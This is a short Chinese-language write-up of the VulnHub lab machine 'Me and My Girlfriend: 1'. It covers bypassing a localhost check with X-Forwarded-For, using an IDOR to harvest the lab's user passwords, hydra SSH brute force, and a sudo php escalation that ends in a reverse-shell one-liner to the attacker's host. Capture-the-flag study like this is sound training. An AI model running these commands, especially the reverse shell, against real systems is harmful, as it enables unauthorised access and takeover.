vulnhub靶场:ME AND MY GIRLFRIEND: 1
靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
实验环境:VMware,kali虚拟机
实战WP
寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065)
nmap扫描端口开放情况,发现开放了22和80端口
nmap 192.168.46.131
访问80端口提示只能从本地访问
尝试爆破目录,没有什么发现
dirb http://192.168.46.131
F12查看源码,提示使用x-forwarded-for
使用插件增加一个x-forwarded-for值127.0.0.1
修改后发现访问成功
发现有注册功能,尝试注册一个账号登录进去,登录成功
可以发现上面有一个id值,修改id值发现其他用户的账号密码
逐个测试发现存在12条记录,得到7个用户名和密码
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
aa:aa
利用hydry,加载刚才得到的账号密码作为字典进行爆破
hydra -C 1.txt ssh://192.168.46.131
爆破出一个可用用户账号alice,密码4lic3,进行ssh连接
ssh alice@192.168.46.131
ls-al查看所以文件
发现一个my_secret,查看内容得到一个flag
接下来提权到root,溢出提权什么的,先不操作,因为是靶机,大多都有sudo滥用提权,直接sudo -l 查看,看到php命令不需要root密码即可使用
使用nc来反弹shell
在靶机上的alice创建一个php反弹shell去连接它
sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.128",6666);exec("/bin/bash -i <&3 >&3 2>&3");'
返回kaili发现已经连接上
在root下发现flag2.txt,打开发现第二个flag
完成